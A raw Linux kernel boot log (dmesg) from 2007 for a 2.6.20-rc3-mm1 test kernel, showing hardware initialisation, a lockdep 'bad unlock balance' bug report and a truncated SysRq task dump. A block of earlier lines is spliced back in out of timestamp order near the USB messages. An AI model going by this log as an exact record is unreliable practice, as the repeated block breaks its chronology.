Fri Jan 5 18:26:08 CET 2007 [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] sanitize start [ 0.000000] sanitize end [ 0.000000] copy_e820_map() start: 0000000000000000 size: 000000000009fc00 end: 000000000009fc00 type: 1 [ 0.000000] copy_e820_map() type is E820_RAM [ 0.000000] copy_e820_map() start: 000000000009fc00 size: 0000000000000400 end: 00000000000a0000 type: 2 [ 0.000000] copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2 [ 0.000000] copy_e820_map() start: 0000000000100000 size: 000000001fef0000 end: 000000001fff0000 type: 1 [ 0.000000] copy_e820_map() type is E820_RAM [ 0.000000] copy_e820_map() start: 000000001fff0000 size: 0000000000003000 end: 000000001fff3000 type: 4 [ 0.000000] copy_e820_map() start: 000000001fff3000 size: 000000000000d000 end: 0000000020000000 type: 3 [ 0.000000] copy_e820_map() start: 00000000ffff0000 size: 0000000000010000 end: 0000000100000000 type: 2 [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) [ 0.000000] BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000001fff0000 (usable) [ 0.000000] BIOS-e820: 000000001fff0000 - 000000001fff3000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000001fff3000 - 0000000020000000 (ACPI data) [ 0.000000] BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) [ 0.000000] 511MB LOWMEM available. [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0 -&gt; 4096 [ 0.000000] Normal 4096 -&gt; 131056 [ 0.000000] early_node_map[1] active PFN ranges [ 0.000000] 0: 0 -&gt; 131056 [ 0.000000] DMI 2.3 present. [ 0.000000] ACPI: PM-Timer IO Port: 0x4008 [ 0.000000] Allocating PCI resources starting at 30000000 (gap: 20000000:dfff0000) [ 0.000000] Detected 1002.305 MHz processor. [ 23.303899] Built 1 zonelists. Total pages: 130033 [ 23.303904] Kernel command line: root=/dev/sdb6 console=ttyS0,38400 console=tty1 lapic [ 23.304292] Local APIC disabled by BIOS -- reenabling. [ 23.304298] Found and enabled local APIC! [ 23.304311] Enabling fast FPU save and restore... done. [ 23.304335] Initializing CPU#0 [ 23.304489] PID hash table entries: 2048 (order: 11, 8192 bytes) [ 23.305768] Console: colour VGA+ 80x25 [ 23.976713] Lock dependency validator: Copyright (c) 2006 Red Hat, Inc., Ingo Molnar [ 23.999935] ... MAX_LOCKDEP_SUBCLASSES: 8 [ 24.012768] ... MAX_LOCK_DEPTH: 30 [ 24.025341] ... MAX_LOCKDEP_KEYS: 2048 [ 24.038435] ... CLASSHASH_SIZE: 1024 [ 24.051787] ... MAX_LOCKDEP_ENTRIES: 8192 [ 24.064881] ... MAX_LOCKDEP_CHAINS: 16384 [ 24.078234] ... CHAINHASH_SIZE: 8192 [ 24.091326] memory used by lock dependency info: 1096 kB [ 24.107537] per task-struct memory footprint: 1200 bytes [ 24.124538] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 24.146082] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 24.201939] Memory: 511896k/524224k available (3204k kernel code, 11796k reserved, 1352k data, 204k init, 0k highmem) [ 24.233778] virtual kernel memory layout: [ 24.233781] fixmap : 0xfffb7000 - 0xfffff000 ( 288 kB) [ 24.233784] vmalloc : 0xe0800000 - 0xfffb5000 ( 503 MB) [ 24.233786] lowmem : 0xc0000000 - 0xdfff0000 ( 511 MB) [ 24.233789] .init : 0xc0576000 - 0xc05a9000 ( 204 kB) [ 24.233792] .data : 0xc0421120 - 0xc05732ac (1352 kB) [ 24.233794] .text : 0xc0100000 - 0xc0421120 (3204 kB) [ 24.349345] Checking if this processor honours the WP bit even in supervisor mode... Ok. [ 24.374067] Clock event device pit configured with caps set: 07 [ 24.533973] Calibrating delay using timer specific routine.. 2006.67 BogoMIPS (lpj=10033387) [ 24.559559] Security Framework v1.0.0 initialized [ 24.573768] Mount-cache hash table entries: 512 [ 24.587724] [ 24.587727] ===================================== [ 24.606374] [ BUG: bad unlock balance detected! ] [ 24.620506] ------------------------------------- [ 24.634639] swapper/0 is trying to release lock (inode_lock) at: [ 24.652797] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.669345] but there are no more locks to release! [ 24.683997] [ 24.683998] other info that might help us debug this: [ 24.703690] 1 lock held by swapper/0: [ 24.714704] #0: (&amp;type-&gt;s_umount_key){--..}, at: [&lt;c0168fcc&gt;] sget+0x1cc/0x370 [ 24.737279] [ 24.737280] stack backtrace: [ 24.750452] [&lt;c0138274&gt;] print_unlock_inbalance_bug+0x104/0x120 [ 24.768558] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.785366] [&lt;c013942a&gt;] trace_hardirqs_on+0xba/0x160 [ 24.800876] [&lt;c012d9a8&gt;] __kernel_text_address+0x18/0x30 [ 24.817162] [&lt;c0104f66&gt;] dump_trace+0x56/0xa0 [ 24.830594] [&lt;c010a4bc&gt;] save_stack_trace+0x1c/0x40 [ 24.845583] [&lt;c01378b0&gt;] save_trace+0x40/0xa0 [ 24.859013] [&lt;c013795b&gt;] add_lock_to_list+0x4b/0xc0 [ 24.874004] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.890812] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.907619] [&lt;c013abee&gt;] lock_release+0x8e/0x180 [ 24.921830] [&lt;c041fd34&gt;] _spin_unlock+0x14/0x20 [ 24.935780] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.952589] [&lt;c0184a03&gt;] sync_inodes_sb+0x83/0xa0 [ 24.967058] [&lt;c016917a&gt;] __fsync_super+0xa/0x70 [ 24.980983] [&lt;c01691e8&gt;] fsync_super+0x8/0x20 [ 24.994387] [&lt;c016922c&gt;] do_remount_sb+0x2c/0x120 [ 25.008858] [&lt;c01697f1&gt;] get_sb_single+0x61/0xd0 [ 25.023067] [&lt;c01a5540&gt;] sysfs_fill_super+0x0/0xb0 [ 25.037797] [&lt;c0169696&gt;] vfs_kern_mount+0xb6/0x130 [ 25.052527] [&lt;c01a5540&gt;] sysfs_fill_super+0x0/0xb0 [ 25.067258] [&lt;c0169723&gt;] kern_mount+0x13/0x20 [ 25.080662] [&lt;c058a22f&gt;] sysfs_init+0x6f/0xb0 [ 25.094093] [&lt;c05897b0&gt;] mnt_init+0xc0/0x200 [ 25.107264] [&lt;c0589387&gt;] vfs_caches_init+0xd7/0x170 [ 25.122254] [&lt;c0576a79&gt;] start_kernel+0x1c9/0x380 [ 25.136723] [&lt;c05764b0&gt;] unknown_bootoption+0x0/0x260 [ 25.152232] ======================= [ 25.163222] CPU: After generic identify, caps: 0183fbff c1c7fbff 00000000 00000000 00000000 00000000 00000000 [ 25.193632] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 25.215060] CPU: L2 Cache: 256K (64 bytes/line) [ 25.228672] CPU: After all inits, caps: 0183fbff c1c7fbff 00000000 00000420 00000000 00000000 00000000 [ 25.257292] Intel machine check architecture supported. [ 25.272992] Intel machine check reporting enabled on CPU#0. [ 25.289742] CPU: AMD Athlon(tm) Processor stepping 02 [ 25.305131] Checking 'hlt' instruction... OK. [ 25.354911] ACPI: Core revision 20060707 [ 25.376063] ACPI: setting ELCR to 0800 (from 0e20) [ 25.633264] Clock event device pit new caps set: 03 [ 25.647904] Clock event device lapic configured with caps set: 04 [ 25.666208] spurious 8259A interrupt: IRQ7. [ 25.788525] NET: Registered protocol family 16 [ 25.802185] ACPI: bus type pci registered [ 25.847315] PCI: PCI BIOS revision 2.10 entry at 0xfb380, last bus=1 [ 25.866390] PCI: Using configuration type 1 [ 25.878963] Setting up standard PCI resources [ 25.917124] ACPI: Interpreter enabled [ 25.928175] ACPI: Using PIC for interrupt routing [ 25.951922] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 25.966653] ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 [ 25.983596] Disabling VIA memory write queue (PCI ID 0305, rev 03): [55] 81 &amp; 1f -&gt; 01 [ 26.007953] PCI quirk: region 4000-40ff claimed by vt82c586 ACPI [ 26.026601] PCI quirk: region 6000-607f claimed by vt82c686 HW-mon [ 26.045179] PCI quirk: region 5000-500f claimed by vt82c686 SMB [ 26.063508] Boot video device is 0000:01:00.0 [ 26.076679] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 26.129422] ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15) [ 26.152504] ACPI: PCI Interrupt Link [LNKB] (IRQs 1 3 4 5 6 7 *10 11 12 14 15) [ 26.175602] ACPI: PCI Interrupt Link [LNKC] (IRQs 1 3 4 *5 6 7 10 11 12 14 15) [ 26.198697] ACPI: PCI Interrupt Link [LNKD] (IRQs 1 3 4 5 6 7 10 11 12 14 15) *9 [ 26.222215] Linux Plug and Play Support v0.97 (c) Adam Belay [ 26.239246] pnp: PnP ACPI init [ 26.248629] pnp: ACPI device : hid PNP0C01 [ 26.261552] pnp: ACPI device : hid PNP0A03 [ 26.274476] pnp: ACPI device : hid PNP0C02 [ 26.286930] pnp: ACPI device : hid PNP0200 [ 26.299353] pnp: ACPI device : hid PNP0B00 [ 26.311800] pnp: ACPI device : hid PNP0800 [ 26.324256] pnp: ACPI device : hid PNP0C04 [ 26.337026] pnp: ACPI device : hid PNP0700 [ 26.349880] pnp: ACPI device : hid PNP0501 [ 26.363227] pnp: ACPI device : hid PNP0501 [ 26.376776] pnp: ACPI device : hid PNP0400 [ 26.390142] pnp: ACPI device : hid PNP0F13 [ 26.402670] pnp: ACPI device : hid PNP0303 [ 26.415118] pnp: PnP ACPI: found 13 devices [ 26.427838] Generic PHY: Registered new driver [ 26.441528] SCSI subsystem initialized [ 26.452880] libata version 2.00 loaded. [ 26.464607] usbcore: registered new interface driver usbfs [ 26.481181] usbcore: registered new interface driver hub [ 26.497271] usbcore: registered new device driver usb [ 26.512651] PCI: Using ACPI for IRQ routing [ 26.525245] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 26.580964] pnp: the driver 'system' has been registered [ 26.597018] pnp: match found with the PnP device '00:00' and the driver 'system' [ 26.619239] pnp: match found with the PnP device '00:02' and the driver 'system' [ 26.642339] ieee1394: Initialized config rom entry `ip1394' [ 26.659404] PCI: Bridge: 0000:00:01.0 [ 26.670442] IO window: disabled. [ 26.680700] MEM window: dc000000-ddffffff [ 26.693297] PREFETCH window: d0000000-d7ffffff [ 26.707212] PCI: Setting latency timer of device 0000:00:01.0 to 64 [ 26.726113] NET: Registered protocol family 2 [ 26.832618] IP route cache hash table entries: 4096 (order: 2, 16384 bytes) [ 26.853820] TCP established hash table entries: 16384 (order: 7, 655360 bytes) [ 26.879082] TCP bind hash table entries: 8192 (order: 6, 360448 bytes) [ 26.900603] TCP: Hash tables configured (established 16384 bind 8192) [ 26.919967] TCP reno registered [ 26.954278] Total HugeTLB memory allocated, 0 [ 26.967552] VFS: Disk quotas dquot_6.5.1 [ 26.979421] Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) [ 26.999241] SGI XFS with ACLs, security attributes, no debug enabled [ 27.018560] SGI XFS Quota Management subsystem [ 27.031966] io scheduler noop registered [ 27.043867] io scheduler cfq registered (default) [ 27.058186] PCI: Disabling Via external APIC routing [ 27.073139] pci 0000:00:07.2: uhci_check_and_reset_hc: legsup = 0x2000 [ 27.092728] pci 0000:00:07.2: Performing full reset [ 27.107396] pci 0000:00:07.3: uhci_check_and_reset_hc: legsup = 0x2000 [ 27.127001] pci 0000:00:07.3: Performing full reset [ 27.142179] ACPI: CPU0 (power states: C1[C1] C2[C2]) [ 27.157354] ACPI: Processor [CPU0] (supports 2 throttling states) [ 27.294720] Real Time Clock Driver v1.12ac [ 27.307461] Non-volatile memory driver v1.2 [ 27.320167] Linux agpgart interface v0.101 (c) Dave Jones [ 27.336582] agpgart: Detected VIA Twister-K/KT133x/KM133 chipset [ 27.361559] agpgart: AGP aperture is 64M @ 0xd8000000 [ 27.376922] Serial: 8250/16550 driver $Revision: 1.90 $ 1 ports, IRQ sharing disabled [ 27.400789] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A [ 27.419481] pnp: the driver 'serial' has been registered [ 27.435726] pnp: match found with the PnP device '00:08' and the driver 'serial' [ 27.458364] 00:08: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A [ 27.475561] pnp: match found with the PnP device '00:09' and the driver 'serial' [ 27.498276] pnp: Device 00:09 disabled. [ 27.510100] parport_pc: VIA 686A/8231 detected [ 27.523463] parport_pc: probing current configuration [ 27.538667] parport_pc: Current parallel port base: 0x378 [ 27.554941] parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE,EPP] [ 27.651985] parport_pc: VIA parallel port: io=0x378, irq=7 [ 27.668867] Floppy drive(s): fd0 is 1.44M [ 27.695571] FDC 0 is a post-1991 82077 [ 27.708036] fealnx.c:v2.52 Sep-11-2006 [ 27.720182] ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 11 [ 27.737446] PCI: setting IRQ 11 as level-triggered [ 27.751862] ACPI: PCI Interrupt 0000:00:08.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 [ 27.778365] eth0: 100/10M Ethernet PCI Adapter at 0001ec00, 00:02:2a:c0:86:2a, IRQ 11. [ 27.802910] Linux video capture interface: v2.00 [ 27.816832] bttv: driver version 0.9.16 loaded [ 27.830217] bttv: using 8 buffers with 2080k (520 pages) each for capture [ 27.850723] bttv: Bt8xx card found (0). [ 27.863011] ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 [ 27.880271] PCI: setting IRQ 10 as level-triggered [ 27.894692] ACPI: PCI Interrupt 0000:00:09.0[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 27.920971] bttv0: Bt878 (rev 17) at 0000:00:09.0, irq: 10, latency: 32, mmio: 0xdf001000 [ 27.945644] bttv0: detected: Hauppauge WinTV [card=10], PCI subsystem ID is 0070:13eb [ 27.969165] bttv0: using: Hauppauge (bt878) [card=10,autodetected] [ 27.987789] bttv0: gpio: en=00000000, out=00000000 in=00ffffdb [init] [ 28.009642] bttv0: Hauppauge/Voodoo msp34xx: reset line init [5] [ 28.057830] tveeprom 0-0050: Hauppauge model 61344, rev D421, serial# 3902813 [ 28.079268] tveeprom 0-0050: tuner model is Philips FM1216 (idx 21, type 5) [ 28.100179] tveeprom 0-0050: TV standards PAL(B/G) (eeprom 0x04) [ 28.118233] tveeprom 0-0050: audio processor is MSP3415 (idx 6) [ 28.136028] tveeprom 0-0050: has radio [ 28.147296] bttv0: Hauppauge eeprom indicates model#61344 [ 28.163515] bttv0: using tuner=5 [ 28.173324] bttv0: registered device video0 [ 28.185991] bttv0: registered device vbi0 [ 28.198128] bttv0: registered device radio0 [ 28.210737] bttv0: PLL: 28636363 =&gt; 35468950 .. ok [ 28.264157] input: i2c IR (Hauppauge) as /class/input/input0 [ 28.281180] ir-kbd-i2c: i2c IR (Hauppauge) detected at i2c-0/0-0018/ir0 [bt878 #0 [sw]] [ 28.312154] msp3400 0-0040: MSP3415D-B3 found @ 0x80 (bt878 #0 [sw]) [ 28.331229] msp3400 0-0040: MSP3415D-B3 supports nicam, mode is autodetect [ 28.356842] tuner 0-0061: chip found @ 0xc2 (bt878 #0 [sw]) [ 28.373704] tuner 0-0061: type set to 5 (Philips PAL_BG (FI1216 and compatibles)) [ 28.396177] tuner 0-0061: type set to 5 (Philips PAL_BG (FI1216 and compatibles)) [ 28.429308] pata_via 0000:00:07.1: version 0.2.0 [ 28.443388] ata1: PATA max UDMA/66 cmd 0x1F0 ctl 0x3F6 bmdma 0xD000 irq 14 [ 28.464642] ata2: PATA max UDMA/66 cmd 0x170 ctl 0x376 bmdma 0xD008 irq 15 [ 28.485333] scsi0 : pata_via [ 28.672171] ata1.00: ATA-6, max UDMA/100, 39865392 sectors: LBA [ 28.690221] ata1.00: ata1: dev 0 multi count 16 [ 28.721523] ata1.01: ATA-7, max UDMA/133, 490234752 sectors: LBA48 [ 28.740357] ata1.01: ata1: dev 1 multi count 16 [ 28.791995] ata1.00: configured for UDMA/66 [ 28.841429] ata1.01: configured for UDMA/66 [ 28.854025] scsi1 : pata_via [ 29.201215] ata2.00: ATAPI, max MWDMA2 [ 29.391652] ata2.01: ATAPI, max MWDMA2 [ 29.600944] ata2.00: configured for MWDMA2 [ 29.791458] ata2.01: configured for MWDMA2 [ 29.804041] scsi 0:0:0:0: Direct-Access ATA SAMSUNG SV2042H PK10 PQ: 0 ANSI: 5 [ 29.828591] SCSI device sda: 39865392 512-byte hdwr sectors (20411 MB) [ 29.848245] sda: Write Protect is off [ 29.859283] sda: Mode Sense: 00 3a 00 00 [ 29.871141] SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 29.898140] SCSI device sda: 39865392 512-byte hdwr sectors (20411 MB) [ 29.917778] sda: Write Protect is off [ 29.928799] sda: Mode Sense: 00 3a 00 00 [ 29.940652] SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 29.967553] sda: sda1 sda2 &lt; sda5 &gt; [ 30.003222] sd 0:0:0:0: Attached scsi disk sda [ 30.016833] scsi 0:0:1:0: Direct-Access ATA Maxtor 6L250R0 BAH4 PQ: 0 ANSI: 5 [ 30.041332] SCSI device sdb: 490234752 512-byte hdwr sectors (251000 MB) [ 30.061497] sdb: Write Protect is off [ 30.072531] sdb: Mode Sense: 00 3a 00 00 [ 30.084368] SCSI device sdb: write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 30.111369] SCSI device sdb: 490234752 512-byte hdwr sectors (251000 MB) [ 30.132056] sdb: Write Protect is off [ 30.143090] sdb: Mode Sense: 00 3a 00 00 [ 30.154913] SCSI device sdb: write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 30.181795] sdb: sdb1 sdb2 sdb3 sdb4 &lt; sdb5 sdb6 &gt; [ 30.233660] sd 0:0:1:0: Attached scsi disk sdb [ 30.247539] scsi 1:0:0:0: CD-ROM SAMSUNG DVD-ROM SD-612S SS06 PQ: 0 ANSI: 5 [ 30.272992] scsi 1:0:1:0: CD-ROM SAMSUNG CD-R/RW SW-208B BS04 PQ: 0 ANSI: 5 [ 30.298155] usbmon: debugfs is not available [ 30.310999] ehci_hcd: block sizes: qh 128 qtd 96 itd 192 sitd 96 [ 30.329125] ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver [ 30.351600] ohci_hcd: block sizes: ed 64 td 64 [ 30.365056] USB Universal Host Controller Interface driver v3.0 [ 30.383875] ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 10 [ 30.401138] ACPI: PCI Interrupt 0000:00:07.2[D] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 30.427444] uhci_hcd 0000:00:07.2: UHCI Host Controller [ 30.443802] drivers/usb/core/inode.c: creating file 'devices' [ 30.461072] drivers/usb/core/inode.c: creating file '001' [ 30.477311] uhci_hcd 0000:00:07.2: new USB bus registered, assigned bus number 1 [ 30.499531] uhci_hcd 0000:00:07.2: detected 2 ports [ 30.514200] uhci_hcd 0000:00:07.2: uhci_check_and_reset_hc: cmd = 0x0000 [ 30.534322] uhci_hcd 0000:00:07.2: Performing full reset [ 30.550294] uhci_hcd 0000:00:07.2: irq 10, io base 0x0000d400 [ 30.567664] usb usb1: default language 0x0409 [ 30.580794] usb usb1: new device found, idVendor=0000, idProduct=0000 [ 30.600125] usb usb1: new device strings: Mfr=3, Product=2, SerialNumber=1 [ 30.620753] usb usb1: Product: UHCI Host Controller [ 30.635403] usb usb1: Manufacturer: Linux 2.6.20-rc3-mm1 uhci_hcd [ 30.653697] usb usb1: SerialNumber: 0000:00:07.2 [ 30.667613] usb usb1: uevent [ 30.676903] usb usb1: usb_probe_device [ 30.688394] usb usb1: configuration #1 chosen from 1 choice [ 30.705156] usb usb1: adding 1-0:1.0 (config #1, interface 0) [ 30.722451] usb 1-0:1.0: uevent [ 30.731977] hub 1-0:1.0: usb_probe_interface [ 30.744826] hub 1-0:1.0: usb_probe_interface - got id [ 30.760008] hub 1-0:1.0: USB hub found [ 30.771317] hub 1-0:1.0: 2 ports detected [ 30.783375] hub 1-0:1.0: standalone hub [ 30.794910] hub 1-0:1.0: no power switching (usb 1.0) [ 30.810091] hub 1-0:1.0: individual port over-current protection [ 30.828139] hub 1-0:1.0: power on to power good time: 2ms [ 30.844363] hub 1-0:1.0: local power source is good [ 30.859026] hub 1-0:1.0: trying to enable port power on non-switchable hub [ 30.980388] hub 1-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 30.996984] drivers/usb/core/inode.c: creating file '001' [ 31.013284] ACPI: PCI Interrupt 0000:00:07.3[D] -&gt; Link [LNKD] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 31.039571] uhci_hcd 0000:00:07.3: UHCI Host Controller [ 31.055324] uhci_hcd 0000:00:07.2: port 1 portsc 018a,00 [ 31.071318] hub 1-0:1.0: port 1, status 0300, change 0003, 1.5 Mb/s [ 31.090178] drivers/usb/core/inode.c: creating file '002' [ 31.106442] uhci_hcd 0000:00:07.3: new USB bus registered, assigned bus number 2 [ 31.128672] uhci_hcd 0000:00:07.3: detected 2 ports [ 31.143345] uhci_hcd 0000:00:07.3: uhci_check_and_reset_hc: cmd = 0x0000 [ 24.012768] ... MAX_LOCK_DEPTH: 30 [ 24.025341] ... MAX_LOCKDEP_KEYS: 2048 [ 24.038435] ... CLASSHASH_SIZE: 1024 [ 24.051787] ... MAX_LOCKDEP_ENTRIES: 8192 [ 24.064881] ... MAX_LOCKDEP_CHAINS: 16384 [ 24.078234] ... CHAINHASH_SIZE: 8192 [ 24.091326] memory used by lock dependency info: 1096 kB [ 24.107537] per task-struct memory footprint: 1200 bytes [ 24.124538] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 24.146082] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 24.201939] Memory: 511896k/524224k available (3204k kernel code, 11796k reserved, 1352k data, 204k init, 0k highmem) [ 24.233778] virtual kernel memory layout: [ 24.233781] fixmap : 0xfffb7000 - 0xfffff000 ( 288 kB) [ 24.233784] vmalloc : 0xe0800000 - 0xfffb5000 ( 503 MB) [ 24.233786] lowmem : 0xc0000000 - 0xdfff0000 ( 511 MB) [ 24.233789] .init : 0xc0576000 - 0xc05a9000 ( 204 kB) [ 24.233792] .data : 0xc0421120 - 0xc05732ac (1352 kB) [ 24.233794] .text : 0xc0100000 - 0xc0421120 (3204 kB) [ 24.349345] Checking if this processor honours the WP bit even in supervisor mode... Ok. [ 24.374067] Clock event device pit configured with caps set: 07 [ 24.533973] Calibrating delay using timer specific routine.. 2006.67 BogoMIPS (lpj=10033387) [ 24.559559] Security Framework v1.0.0 initialized [ 24.573768] Mount-cache hash table entries: 512 [ 24.587724] [ 24.587727] ===================================== [ 24.606374] [ BUG: bad unlock balance detected! ] [ 24.620506] ------------------------------------- [ 24.634639] swapper/0 is trying to release lock (inode_lock) at: [ 24.652797] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.669345] but there are no more locks to release! [ 24.683997] [ 24.683998] other info that might help us debug this: [ 24.703690] 1 lock held by swapper/0: [ 24.714704] #0: (&amp;type-&gt;s_umount_key){--..}, at: [&lt;c0168fcc&gt;] sget+0x1cc/0x370 [ 24.737279] [ 24.737280] stack backtrace: [ 24.750452] [&lt;c0138274&gt;] print_unlock_inbalance_bug+0x104/0x120 [ 24.768558] [&lt;c0184738&gt;] generic_sync_sb_inodes+0xa8/0x2d0 [ 24.785366] [&lt;c013942a&gt;] trace_hardirqs_on+0xba/0x160 [ 31.106442] uhci_hcd 0000:00:07.3: new USB bus registered, assigned bus number 2 [ 31.128672] uhci_hcd 0000:00:07.3: detected 2 ports [ 31.143345] uhci_hcd 0000:00:07.3: uhci_check_and_reset_hc: cmd = 0x0000 [ 31.163466] uhci_hcd 0000:00:07.3: Performing full reset [ 31.179434] uhci_hcd 0000:00:07.3: irq 10, io base 0x0000d800 [ 31.196789] usb usb2: default language 0x0409 [ 31.209910] usb usb2: new device found, idVendor=0000, idProduct=0000 [ 31.229243] usb usb2: new device strings: Mfr=3, Product=2, SerialNumber=1 [ 31.249878] usb usb2: Product: UHCI Host Controller [ 31.264548] usb usb2: Manufacturer: Linux 2.6.20-rc3-mm1 uhci_hcd [ 31.282846] usb usb2: SerialNumber: 0000:00:07.3 [ 31.296762] usb usb2: uevent [ 31.306054] usb usb2: usb_probe_device [ 31.317472] usb usb2: configuration #1 chosen from 1 choice [ 31.334248] usb usb2: adding 2-0:1.0 (config #1, interface 0) [ 31.351550] usb 2-0:1.0: uevent [ 31.361076] hub 2-0:1.0: usb_probe_interface [ 31.373920] hub 2-0:1.0: usb_probe_interface - got id [ 31.389117] hub 2-0:1.0: USB hub found [ 31.400424] hub 2-0:1.0: 2 ports detected [ 31.412497] hub 2-0:1.0: standalone hub [ 31.424029] hub 2-0:1.0: no power switching (usb 1.0) [ 31.439203] hub 2-0:1.0: individual port over-current protection [ 31.457263] hub 2-0:1.0: power on to power good time: 2ms [ 31.473506] hub 2-0:1.0: local power source is good [ 31.488170] hub 2-0:1.0: trying to enable port power on non-switchable hub [ 31.539438] hub 1-0:1.0: debounce: port 1: total 100ms stable 100ms status 0x300 [ 31.561669] uhci_hcd 0000:00:07.2: port 2 portsc 018a,00 [ 31.577650] hub 1-0:1.0: port 2, status 0300, change 0003, 1.5 Mb/s [ 31.629548] drivers/usb/core/inode.c: creating file '001' [ 31.749300] hub 1-0:1.0: debounce: port 2: total 100ms stable 100ms status 0x300 [ 31.771521] hub 1-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 31.788018] hub 2-0:1.0: state 7 ports 2 chg 0000 evt 0006 [ 31.804521] uhci_hcd 0000:00:07.3: port 1 portsc 018a,00 [ 31.820503] hub 2-0:1.0: port 1, status 0300, change 0003, 1.5 Mb/s [ 31.999138] hub 2-0:1.0: debounce: port 1: total 100ms stable 100ms status 0x300 [ 32.021354] uhci_hcd 0000:00:07.3: port 2 portsc 018a,00 [ 32.037335] hub 2-0:1.0: port 2, status 0300, change 0003, 1.5 Mb/s [ 32.209002] hub 2-0:1.0: debounce: port 2: total 100ms stable 100ms status 0x300 [ 32.231208] hub 2-0:1.0: state 7 ports 2 chg 0000 evt 0000 [ 32.247708] usbcore: registered new interface driver libusual [ 32.264988] pnp: the driver 'i8042 kbd' has been registered [ 32.281852] pnp: match found with the PnP device '00:0c' and the driver 'i8042 kbd' [ 32.304878] pnp: the driver 'i8042 aux' has been registered [ 32.321693] pnp: match found with the PnP device '00:0b' and the driver 'i8042 aux' [ 32.344694] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 [ 32.368289] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 32.383222] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 32.398801] mice: PS/2 mouse device common for all mice [ 32.434226] input: AT Translated Set 2 keyboard as /class/input/input1 [ 32.457687] input: PC Speaker as /class/input/input2 [ 32.610446] input: GenPS/2 Genius Mouse as /class/input/input3 [ 32.630563] i2c /dev entries driver [ 32.868571] usb usb1: suspend_rh (auto-stop) [ 32.881432] PM-Timer running at invalid rate: 142% of normal - aborting. [ 32.901609] Advanced Linux Sound Architecture Driver Version 1.0.14rc1 (Wed Dec 20 08:11:48 2006 UTC). [ 32.930803] ACPI: PCI Interrupt 0000:00:09.1[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 32.960202] ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 5 [ 32.977272] PCI: setting IRQ 5 as level-triggered [ 32.991427] ACPI: PCI Interrupt 0000:00:07.5[C] -&gt; Link [LNKC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [ 33.017346] PCI: Setting latency timer of device 0000:00:07.5 to 64 [ 33.358256] usb usb2: suspend_rh (auto-stop) [ 33.550173] ALSA device list: [ 33.559128] #0: VIA 82C686A/B rev20 with STAC9721,23 at 0xdc00, irq 5 [ 33.578991] #1: Brooktree Bt878 at 0xdf002000, irq 10 [ 33.594846] NET: Registered protocol family 1 [ 33.608099] Testing NMI watchdog ... OK. [ 33.720680] Using IPI Shortcut mode [ 33.731299] ACPI: (supports&lt;6&gt;Time: tsc clocksource has been installed. [ 33.751263] Clock event device lapic disabled [ 33.764376] Clock event device pit configured with caps set: 08 [ 33.782187] Switched to high resolution mode on CPU 0 [ 33.797382] Time: pit clocksource has been installed. [ 33.817506] S0 S1 S4 S5) [ 117.050377] SysRq : Show State [ 117.059674] [ 117.059676] free sibling [ 117.084301] task PC stack pid father child younger older [ 117.105190] swapper D 00000000 0 1 0 2 (L-TLB) [ 117.128646] dff83bdc 00000096 df828008 00000000 00000046 dfcb6f10 dfcb6ef4 dff81510 [ 117.153766] 00000009 dff81510 e0483c2b 00000007 0000757f dff8161c dfcb6ef4 00000296 [ 117.179485] dfcb6ef4 dfcb6eec 00000296 dfcb6ef4 dff81510 c041fb07 00000001 dff81510 [ 117.205203] Call Trace: [ 117.213182] [&lt;c041fb07&gt;] __down+0x87/0xec [ 117.225597] [&lt;c01185b0&gt;] default_wake_function+0x0/0x10 [ 117.241625] [&lt;c041f91b&gt;] __down_failed+0x7/0xc [ 117.255316] 